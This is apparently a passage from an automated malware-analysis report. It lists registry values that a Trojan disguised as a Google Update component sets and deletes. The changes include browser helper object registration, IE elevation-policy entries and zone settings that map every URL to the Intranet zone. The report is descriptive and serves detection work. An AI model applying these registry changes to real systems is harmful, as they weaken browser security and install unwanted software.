[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 88 C3 36 07 0E DE 7F DC A9 ED DE ED E2 55 71"
[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"
[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
The process GoogleUpdate.exe:3944 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 58 90 39 89 16 B8 29 AA 2D EF 95 C6 6A 4F A8"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 35 6D 94 29 04 1E 59 A6 E8 CB A9 DB 20 2B EF"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 7E 01 12 B8 CD 08 A1 51 AA E0 02 82 43 95 5F"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"pv" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"tttoken"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"
[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"
[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"
[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 41 F5 11 07 A9 04 E6 CD 98 CB F8 47 74 7A 50"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"
[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process 17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 61 B7 7F B7 9F 4C ED B5 6F F7 42 2C C1 2B 9E"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611471155}" = ""
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppPath" = "%Program Files%\winservice86"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"Policy" = "3"
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil64.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611471155}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"AppPath" = "%Program Files%\winservice86"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 7A 13 E3 74 1B A1 1E 22 F2 42 83 C6 93 A3 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The process 17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 B8 EF 07 45 62 71 F2 C0 1F CD 6C AA F9 EC B5"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process 17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 90 E6 8B C3 89 B7 8A 48 11 37 9B 49 48 05 7C"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process winservice86-bg.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 62 9B 3A 74 C7 7E 5A D7 9F 50 C9 E5 DA 1B A1"
The process winservice86-codedownloader.exe:2888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 28 FC A9 F1 AD 20 35 6E 84 27 D8 47 E2 FC 3A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web-nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process winservice86-codedownloader.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A B5 DB 82 26 76 08 BF EF 7E DF CF EC 86 B8 AD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web-nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\HELPDIR]
"(Default)" = "%Program Files%\winservice86"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"Version" = "1.0"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}]
"(Default)" = "ISandBox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "winservice86"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}]
"(Default)" = "ICrossriderBHO"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"Version" = "1.0"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755 Type Library"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CLSID]
